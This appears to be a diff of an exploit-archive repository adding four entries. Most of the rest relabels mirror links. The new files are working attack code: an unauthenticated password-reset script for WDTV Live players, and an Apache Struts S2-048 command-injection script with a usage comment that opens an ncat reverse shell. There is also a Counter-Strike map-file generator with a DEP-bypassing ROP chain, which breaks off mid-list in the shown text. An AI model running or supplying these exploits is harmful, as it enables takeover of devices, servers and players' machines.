DB: 2017-07-15

4 new exploits

Counter Strike: Condition Zero - '.BSP' Map File Code Execution

Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution
Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)
WDTV Live SMP 2.03.20 - Remote Password Reset

files.csv

@@ -9132,6 +9132,7 @@ id,file,description,date,author,platform,type,port
 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
+42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15693,6 +15694,7 @@ id,file,description,date,author,platform,type,port
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
+42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38134,3 +38136,5 @@ id,file,description,date,author,platform,type,port
 42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
 42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
 42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
+42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
+42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0

platforms/android/local/9477.txt

@@ -1,6 +1,6 @@
 Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
 
-orig: http://zenthought.org/content/file/android-root-2009-08-16-source
-EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
+http://zenthought.org/content/file/android-root-2009-08-16-source
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
 
 # milw0rm.com [2009-08-18]

platforms/bsd/remote/19520.txt

@@ -3,6 +3,9 @@ This exploit was leaked on the Full Disclosure mailing list:
 http://seclists.org/fulldisclosure/2012/Jun/404
 
 
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
+
+
 BSD telnetd Remote Root Exploit *ZERODAY*
 By Kingcope
 Year 2011
@@ -48,6 +51,3 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
 02:41:51 UTC 2011
 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  amd64
 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
-
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
-

platforms/hardware/webapps/29959.txt

@@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
 Root-Node
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse

platforms/hardware/webapps/42326.txt

@@ -0,0 +1,63 @@
+#######################################################
+## WDTV Live SMP Remote Password Reset Vulnerability ##
+#######################################################
+
+Date: Jul 14 2017
+Author: sw1tch
+Demo: https://www.sw1tch.net/2017/07/12/wdtv-live-smb-exploit/
+Description: A simple remotely exploitable web application vulnerability
+for the WDTV Live Streaming Media Player and possibly other WDTV systems.
+
+-INTRO-
+
+The WDTV Live SMP is a is a consumer device produced by Western Digital
+that plays videos, images, and music from USB drives. It can play
+high-definition video through an HDMI port, and standard video through
+composite video cables. It can play most common video and audio formats. As
+of August 2016, the WDTV appears to be discontinued.
+
+The latest firmware version appears to be 2.03.20.
+
+-VULNERABILITY-
+
+The WDTV Live SMP runs an embedded webserver, allowing authenticated users
+to upload themes, manage device settings, access a virtual remote and other
+tasks. To authenticate, a user needs to provide the correct password (no
+username).
+
+An unauthenticated attacker can update the password via a constructed GET
+request, subsequently taking control of many functions of the device.
+
+Vulnerable versions include at least firmware 2.03.20, and likely many more
+older versions.
+
+-POC-
+
+#!/bin/bash
+
+echo
+echo "WDTV Live SMP Admin Password Reset Exploit"
+echo "Apparently sw1tch found this guff in 2017"
+echo
+if [ $# != 2 ]; then
+  echo "Usage: `basename $0` <target IP/host> <new password>"
+echo
+  exit $ERR_ARG
+fi
+
+# Vars...
+target=$1
+password=$2
+
+echo -n "[*] Slamming your chosen password at $target now..."
+curl "http://$target/DB/modfiy_pw.php" -d "password=$password"
+echo "done!"
+echo "[*] Try logging in to http://$target/ using $password"
+echo
+exit 0
+
+-FIX-
+
+None available. Device appears to be EOL so unlikely to be remediated.
+
+--------------------------------------------------------------------------------------------------------------------------------

platforms/lin_x86-64/local/40049.c

@@ -1,5 +1,5 @@
 /*
-EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
 */
 
 --------------------------------------------------- decr.c ---------------------------------------------------

platforms/lin_x86-64/remote/32277.txt

@@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
 
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz

platforms/linux/dos/10203.txt

@@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
 NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. 
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)

platforms/linux/dos/35081.txt

@@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
 
 $ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
 
-EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
 
 ...
 $ strings strings-bfd-badptr2

platforms/linux/local/37168.txt

@@ -9,6 +9,6 @@
 # CVE : N/A
 
 Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
-EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
 
 Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html

platforms/linux/local/39772.txt

@@ -125,5 +125,5 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=
 
 
 Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
-E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
 

platforms/linux/local/9435.txt

@@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
 */
 
 http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
-EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
 
 # milw0rm.com [2009-08-14]

platforms/linux/local/9436.txt

@@ -4,6 +4,6 @@
 Quick and dirty exploit for this one:
 
 http://www.frasunek.com/proto_ops.tgz
-EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
 
 # milw0rm.com [2009-08-14]

platforms/linux/webapps/30085.txt

@@ -8,7 +8,7 @@
 # CVE : No CVE, no patch just 0Day
 # State : Critical
 
-# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
 
 ---------------Description-----------------
 

platforms/multiple/dos/10327.txt

@@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
 Avaya Intuity AUDIX LX 1.0
 Avaya Intuity AUDIX
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
 

platforms/multiple/dos/4601.txt

@@ -1,6 +1,6 @@
 Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
 Author: RoMaNSoFt <roman@rs-labs.com>
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
 
 # milw0rm.com [2007-11-02]

platforms/multiple/local/10207.txt

@@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
 VMWare ESX Server 3.5 ESX350-200910401
 VMWare ACE 2.5.3 Build 185404
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)

platforms/multiple/local/10326.txt

@@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
 Ghostscript Ghostscript 8.54
 Ghostscript Ghostscript 8.15
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)

platforms/multiple/webapps/42324.py

@@ -0,0 +1,51 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+# Just a demo for CVE-2017-9791
+
+
+import requests
+
+
+def exploit(url, cmd):
+    print("[+] command: %s" % cmd)
+
+    payload = "%{"
+    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    payload += "(#_memberAccess?(#_memberAccess=#dm):"
+    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+    payload += "(#ognlUtil.getExcludedClasses().clear())."
+    payload += "(#context.setMemberAccess(#dm))))."
+    payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
+    payload += "}"
+
+    data = {
+        "name": payload,
+        "age": 20,
+        "__checkbox_bustedBefore": "true",
+        "description": 1
+    }
+
+    headers = {
+        'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
+    }
+    requests.post(url, data=data, headers=headers)
+
+
+if __name__ == '__main__':
+    import sys
+
+    if len(sys.argv) != 3:
+        print("python %s <url> <cmd>" % sys.argv[0])
+        sys.exit(0)
+
+    print('[*] exploit Apache Struts2 S2-048')
+    url = sys.argv[1]
+    cmd = sys.argv[2]
+
+    exploit(url, cmd)
+
+    # $ ncat -v -l -p 4444 &
+    # $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"

platforms/php/remote/32618.txt

@@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
 ---
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz

platforms/php/webapps/12617.txt

@@ -27,5 +27,5 @@ Test Environment:
 
 ====================================================================
 Download the following file for more instructions and exploits:
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
 ====================================================================

platforms/php/webapps/24480.txt

@@ -22,5 +22,5 @@ Cheers!
 # - A valid account as at least a user
 # - The target to have outgoing internet connectivity
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
 

platforms/win_x86-64/local/20861.txt

@@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
 
 This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
 

platforms/windows/dos/10204.txt

@@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
 
 An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)

platforms/windows/dos/12080.txt

@@ -19,7 +19,7 @@ DoS("DoS");
 
 -------------------------
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
 
 Regards
 

platforms/windows/dos/22402.txt

@@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable.
 Proof of concept included. 
 
 http://www21.zippyshare.com/v/83302158/file.html
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar

platforms/windows/dos/22464.txt

@@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8:
 Proof of concept included. 
 
 http://www42.zippyshare.com/v/23669551/file.html
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf

platforms/windows/dos/23107.txt

@@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable.
 ################################################################################
 Proof of concept included. 
 http://www21.zippyshare.com/v/83302158/file.html 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip

platforms/windows/dos/23201.txt

@@ -65,6 +65,6 @@ User mode DEP access violations are exploitable.
 ################################################################################
 Proof of concept included.
 
-Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
+http://www39.zippyshare.com/v/91522221/file.html
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
 

platforms/windows/dos/31899.txt

@@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
 176efdb4  000003e8
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs

platforms/windows/dos/33056.pl

@@ -1,4 +1,4 @@
-## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
 
 #!/usr/bin/perl -w
 # Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

platforms/windows/dos/4335.txt

@@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
 3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
 4 . the otherside's yahoo! messenger will be crashed.
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
 
 # milw0rm.com [2007-08-29]

platforms/windows/local/17473.txt

@@ -16,5 +16,5 @@
 # also check here for The Persian docs of this methods and more :
 http://www.0days.ir/article/
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
 

platforms/windows/local/17474.txt

@@ -149,4 +149,4 @@ stores in stack :D
 
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)

platforms/windows/local/29881.txt

@@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
 
 @w3bd3vil and @abh1sek
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
 
 Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
 =================================================================

platforms/windows/local/30007.txt

@@ -32,4 +32,4 @@ Trendmicro, CDC
 
 
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip

platforms/windows/local/31895.txt

@@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
 2．	Select all the content in the editor
 3．	Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
 
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z

platforms/windows/local/35661.txt

@@ -1,5 +1,5 @@
-## Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
-## EDB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
+# Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
 
 
 Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

platforms/windows/local/35901.txt

@@ -25,5 +25,5 @@ FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
 context-dependent attacker to corrupt memory and potentially execute
 arbitrary code.
 
-## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
-## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt

platforms/windows/local/35902.txt

@@ -25,5 +25,5 @@ M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
 context-dependent attacker to corrupt memory and potentially execute
 arbitrary code.
 
-## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
-## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
+# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt

platforms/windows/local/37049.txt

@@ -12,10 +12,10 @@ R136a1 / hfiref0x
 ## Compiled EXE:
 ### x86
 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
-+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
++ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
 ### x64 
 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
-+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
++ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
 
 Source Code: 
 https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip

platforms/windows/local/40118.txt

@@ -14,4 +14,4 @@ http://theori.io/research/cve-2016-0189
 3. Browse with a victim IE to `vbscript_bypass_pm.html`.
 4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)
 
-EDB-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip

platforms/windows/local/42325.py

@@ -0,0 +1,237 @@
+#!/usr/bin/env python
+# Counter Strike: Condition Zero BSP map exploit
+#  By @Digital_Cold Jun 11, 2017
+#
+# E-DB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42325.zip (bsp-exploit-source.zip)
+# 
+from binascii import hexlify, unhexlify
+from struct import pack, unpack
+import math
+import mmap
+import logging
+
+fmt = "[+] %(message)s"
+
+logging.basicConfig(level=logging.INFO, format=fmt)
+l = logging.getLogger("exploit")
+
+# Specific to the file
+INDEX_BUFFER_OFF = 0x92ee0          # ARRAY[int]
+VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
+VERTEX_DATA_OFF = 0x37f7c           # ARRAY[VEC3], VEC3[float, float, float]
+NUM_EDGES_OFF = 0x70f94             # The length that was fuzzed to cause the crash
+
+# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
+# SEH_OVERWRITE_OFF = 0x4126C
+
+# Initial offset into the index buffer where the function to exploit resides
+INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
+
+# INDEX_BUFFER
+# 0: 20
+# 1: 10
+# 2: 2 --> Vertex Buffer Indexes
+
+# VERTEX BUFFER INDEXES
+# 0: 1
+# 1: 2
+# 2: 4 --> Vertex Data
+
+# VERTEX DATA
+# 0: 1.23, 23423.0, 3453.3
+# 1: 1.23, -9.0, 3453.3
+# 2: 1.0, 1.0, 1.0
+# 3: 1.0, 1.0, 1.0
+# 4: 0.0, 1.0, 0.0
+
+# Example:
+# a = INDEX_BUFFER[2] ; a = 2
+# b = VERTEX_BUFFER[a] ; b = 4
+# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
+
+def dw(x):
+  return pack("I", x)
+
+def main():
+  target_file = "eip-minimized.bsp"
+  output_file = "exploit-gen.bsp"
+
+  print "GoldSource .BSP file corruptor"
+  print "  by @Digital_Cold"
+  print
+
+  l.info("Corrupting target file %s" % target_file)
+
+  # Read in and memory map target file
+  fp = open(target_file, 'rb')
+  mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
+  fp.close()
+
+  VEC3_COUNT = 63
+  # then come Saved EBP and return address
+
+  start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
+  second_idx = VERTEX_BUFFER_INDEXES_OFF
+  vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
+
+  l.info("Writing to index buffer offset %08x...", start_idx)
+  l.info("Vertex buffer indexes start %08x", second_idx)
+  l.info("Vertex data at %08x", vertex_data_start)
+
+  data_buffer = []
+
+  for i in range(VEC3_COUNT):
+    for j in range(3):
+      data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
+
+  data_buffer.append("\x00\x00\x00\x00") # dont care
+  data_buffer.append("\x00\x00\x00\x00") # unk1
+  data_buffer.append("\x00\x00\x00\x00") # unk2
+
+  data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
+  data_buffer.append("\x00\x00\x00\x00") # EBP
+  data_buffer.append(dw(0x01407316))     # Saved Ret --> POP EBP; RET [hl.exe]
+
+  # XXX: bug in mona. This is a ptr to VirtualProtectEx!!
+  #   0x387e01ec,  # ptr to &VirtualProtect() [IAT steamclient.dll]
+
+  """
+   Register setup for VirtualAlloc() :
+   --------------------------------------------
+    EAX = NOP (0x90909090)
+    ECX = flProtect (0x40)
+    EDX = flAllocationType (0x1000)
+    EBX = dwSize
+    ESP = lpAddress (automatic)
+    EBP = ReturnTo (ptr to jmp esp)
+    ESI = ptr to VirtualAlloc()
+    EDI = ROP NOP (RETN)
+    --- alternative chain ---
+    EAX = ptr to &VirtualAlloc()
+    ECX = flProtect (0x40)
+    EDX = flAllocationType (0x1000)
+    EBX = dwSize
+    ESP = lpAddress (automatic)
+    EBP = POP (skip 4 bytes)
+    ESI = ptr to JMP [EAX]
+    EDI = ROP NOP (RETN)
+    + place ptr to "jmp esp" on stack, below PUSHAD
+   --------------------------------------------
+  """
+
+  # START ROP CHAIN
+  # DEP disable ROP chain
+  # rop chain generated with mona.py - www.corelan.be
+  #
+  # useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
+  rop_gadgets = [
+    #0x3808A308,  # INT3 # RETN [steamclient.dll]
+    0x38420ade,  # POP EDX # RETN [steamclient.dll]
+    0x387e01e8,  # ptr to &VirtualAlloc() [IAT steamclient.dll]
